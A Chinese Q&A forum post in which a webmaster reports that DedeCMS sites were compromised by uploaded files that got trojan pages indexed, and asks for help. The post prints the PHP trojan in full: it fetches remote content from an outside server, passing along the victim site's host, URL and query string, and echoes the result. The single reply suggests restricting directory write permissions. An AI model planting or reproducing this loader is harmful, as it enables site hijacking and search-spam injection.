发现很多织梦站,被上传了文件,导致收录了很多木马页面

2,280 次浏览

发现很多织梦站,被上传了文件,导致收录了很多木马页面,



木马程序:






set_time_limit(0);




header("Content-Type: text/html;charset=gb2312");




date_default_timezone_set('PRC');




$Remote_server = "www.site.com";




$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];




$Content_mb=file_get_contents($Remote_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);




echo $Content_mb;




?>




文件被上传到了静态目录页面,




静态目录文件权限:755   ;修改过文件权限的执行权限,发现后台生成静态页面失败,





请有遇到此问题的同学一起讨论。

追加问题
    1 人参与回答
刘友志
刘友志 · 网络安全资深工程师,玩玩黑帽SEO 【QQ:1203259341】

最表态设置目录权限 禁止写入权限,然后生成文章html的时候 放开权限,完事之后在恢复权限,织梦只能这样才能保险

回复问答禁止带推广链接,了解合理带链接的方法